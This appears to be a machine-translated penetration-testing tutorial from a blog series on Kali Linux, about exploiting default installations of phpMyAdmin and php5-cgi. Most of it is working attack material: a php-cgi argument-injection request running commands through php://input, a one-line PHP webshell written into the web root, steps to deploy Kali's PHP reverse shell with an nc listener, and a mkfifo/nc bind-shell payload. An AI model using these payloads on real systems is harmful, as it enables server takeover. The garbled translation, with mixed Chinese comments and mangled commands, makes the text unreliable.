Manual vulnerability Mining
That is, after the scan, how to verify the vulnerability alarm found.
#默认安装
The notion that the Linux operating system is more secure than the Windows system is due to the fact that the Windows system, when installed by default, opens up many services and useless ports, and is not configured with strict security, and often has system services running with the highest privileges.
Vulnerability type-remote command execution
1, PhpMyadmin
A web interface installed in a Web server dedicated to managing the MySQL database. For earlier versions, if a security configuration was not made after installation and the sensitive path was deleted, it was possible to leave a security risk, the most obvious being setup.
A. Explore the PHP Web site (which can be judged based on information such as banner) whether the phpMyAdmin directory is accessible (scan Tool/manual crawl)
# # # #有账号密码限制, can try to blast # # #
B. Try: Whether the/phpmyadmin/setup directory can be accessed "can configure the server without authentication required"
# # #安全最佳实践角度: Do not allow access to the phpMyAdmin directory from the public network or disable access to the Setup directory
C. Early phpMyAdmin vulnerability "can be done by editing or customizing the instructions sent at the URL address to execute a PHP page"
For example:
POST http://192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d
+auto_prepend_file%3dphp://input http/1.1 #修改服务器中的php. ini file
host:192.168.20.10
<?php
PassThru (' id ');
Die (); #后面的指令不执行, you can block miscellaneous information such as HTML code returned by the server
?>
#编辑一条配置指令来修改php. ini file, a PHP page that can write any function "callable system function, PassThru ()"
#可能运行web服务器进程的用户账号会被限制为www-data such as ordinary user account, you need to go through the right to fully control the server
Burpsuite Replay
#已获得www-data user Rights, you can do LS, cat and other operations "PWD: view current path; Cat Etc/password: View user Account"
#搜索PHP文件中是否用硬编码的账号密码
#尝试写入网页木马, control server
Note: This vulnerability may not be swept out by the scanner, you can manually verify
D. Web Trojan
Ready-made web Trojan can be found in Kali Armory
Static Trojan Webshell, accessed through the browser
For example: echo "<?php \ $cmd = \$_get[" cmd "];system (\ $cmd);? > ">/var/www/3.php" the simplest Trojan "
"\" Prevents variables from being filtered during the upload process
Execute command in Browser "Note: Cannot access 3.php directory directly, need to add question mark to execute"
Bounce Shell "Submit a request (containing a bounce shell)"
#账号一般还是会是普通用户 There are various types of shells in Kali
[email protected]:/usr/share/webshells# lsasp aspx cfm JSP perl Php[email protected]:/usr/sha re/webshells# CD php[email protected]:/usr/share/webshells/php# lsfindsock.c php-findsock-shell.php qsd-php-b ackdoor.phpphp-backdoor.php php-reverse-shell.php Simple-backdoor.php[email protected]:/usr/share/webshells
/php# CP php-reverse-shell.php/root/3.php[email protected]:/usr/share/webshells/php#
#修改shell中反弹连接的IP
#使用nc侦听反弹端口1234 NC terminal cannot use the TAB key
#将shell代码复制粘贴进POST, Go Send "This method is relatively hidden, not easy to hair Now "
############################################################################
When some commands, such as ifconfig, cannot be used
#################################################################################
2. CGI module "Ubuntu/debian default installation Php5-cgi"
#可直接访问/CGI-BIN/PHP5 and/cgi-bin/php (most of these directories cannot be crawled) #因为其不在/var/www directory
#定制编码shellcode
#使服务器打开一个端口, and then use NC to connect to get the shell
<?php
echo System (' Mkfifo/tmp/pipe;sh/tmp/pipe | nc-nlp 4444 >/tmp/pipe ');
?>
#若有防火墙, you need to make sure that the firewall allows
Small white diary 35:kali Penetration Testing Web Penetration-Manual vulnerability Mining (i)-vulnerability caused by default installation